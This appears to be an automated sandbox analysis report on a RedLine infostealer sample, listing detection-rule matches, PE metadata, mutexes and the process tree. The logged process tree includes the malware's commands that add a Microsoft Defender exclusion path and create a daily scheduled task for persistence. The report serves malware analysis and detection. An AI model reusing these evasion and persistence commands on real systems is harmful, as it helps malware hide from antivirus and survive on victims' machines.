                        Source: C:\Windows\System32\FXSSVC.exe Code function: 23_2_006F7C00
                        Source: C:\Windows\System32\FXSSVC.exe Code function: 23_2_00722D40
                        Source: C:\Windows\System32\FXSSVC.exe Code function: 23_2_006F79F0
                        Source: C:\Windows\System32\FXSSVC.exe Code function: 23_2_0071EEB0
                        Source: C:\Windows\System32\FXSSVC.exe Code function: 23_2_007192A0
                        Source: C:\Windows\System32\FXSSVC.exe Code function: 23_2_007193B0
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 25_2_009BA810
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 25_2_00997C00
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 25_2_009979F0
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 25_2_009C2D40
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 25_2_009BEEB0
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 25_2_009B92A0
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 25_2_009B93B0
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Load Driver
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Security
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: String function: 00445975 appears 65 times
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: String function: 0041171A appears 37 times
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: String function: 0041718C appears 45 times
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Code function: String function: 0040E6D0 appears 35 times
                        Source: Acrobat.exe.3.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                        Source: chrmstp.exe.3.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                        Source: chrmstp.exe.3.dr Static PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
                        Source: 117.0.5938.132_chrome_installer.exe.3.dr Static PE information: Resource name: B7 type: 7-zip archive data, version 0.4
                        Source: 117.0.5938.132_chrome_installer.exe.3.dr Static PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
                        Source: chrome_pwa_launcher.exe.3.dr Static PE information: Number of sections : 13 > 10
                        Source: elevation_service.exe.3.dr Static PE information: Number of sections : 12 > 10
                        Source: elevation_service.exe0.3.dr Static PE information: Number of sections : 12 > 10
                        Source: chrmstp.exe.3.dr Static PE information: Number of sections : 14 > 10
                        Source: AENiBH7X1q.exe, 00000000.00000003.2099739381.0000000004003000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs AENiBH7X1q.exe
                        Source: AENiBH7X1q.exe, 00000000.00000003.2100287405.000000000442D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs AENiBH7X1q.exe
                        Source: unknown Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                        Source: AENiBH7X1q.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: 2.2.svchost.exe.5800000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 3.0.microsofts.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 00000002.00000002.2120236907.0000000005800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, type: DROPPED Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: armsvc.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: ShowAppPickerForPDF.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Acrobat.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: private_browsing.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: updater.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Au3Info.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Au3Info_x64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AutoIt3Help.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AutoIt3_x64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: appvcleaner.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: SciTE.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AppVShNotify.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: IntegratedOffice.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MavInject32.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: OfficeC2RClient.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: officesvcmgr.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: chrome_pwa_launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: chrmstp.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AppVClient.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: DiagnosticsHub.StandardCollector.Service.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AdobeARMHelper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jaureg.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jucheck.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jusched.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: java.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaw.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaws.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleCrashHandler.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: alg.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleCrashHandler64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: FXSSVC.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: elevation_service.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: elevation_service.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateCore.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: GoogleUpdateOnDemand.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jabswitch.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: java-rmi.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: java.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javacpl.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaw.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: maintenanceservice.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: msdtc.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: msiexec.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: PerceptionSimulationService.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: perfhost.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaws.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jjs.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jp2launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: keytool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: kinit.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: klist.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: ktab.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: orbd.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: pack200.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Native_Redline_BTC.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Native_Redline_BTC.exe.2.dr, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: Native_Redline_BTC.exe.2.dr, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: 2.2.svchost.exe.6200000.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: 2.2.svchost.exe.6200000.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                        Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@45/170@173/23
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_04DFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,2_2_04DFCBD0
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                        Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Roaming\cfd441acea3434e2.binJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
                        Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-cfd441acea3434e2-inf
                        Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-cfd441acea3434e29ea72c54-b
                        Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-cfd441acea3434e273779169-b
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_03
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeFile created: C:\Users\user\AppData\Local\Temp\vehiculationJump to behavior
                        Source: AENiBH7X1q.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe File read: C:\Users\desktop.ini
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: AENiBH7X1q.exe ReversingLabs: Detection: 45%
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe File read: C:\Users\user\Desktop\AENiBH7X1q.exe
                        Source: C:\Windows\SysWOW64\svchost.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
                        Source: unknown Process created: C:\Users\user\Desktop\AENiBH7X1q.exe "C:\Users\user\Desktop\AENiBH7X1q.exe"
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AENiBH7X1q.exe"
                        Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\microsofts.exe "C:\Users\user\AppData\Local\Temp\microsofts.exe"
                        Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"
                        Source: unknown Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                        Source: unknown Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpEAAD.tmp.cmd""
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
                        Source: unknown Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
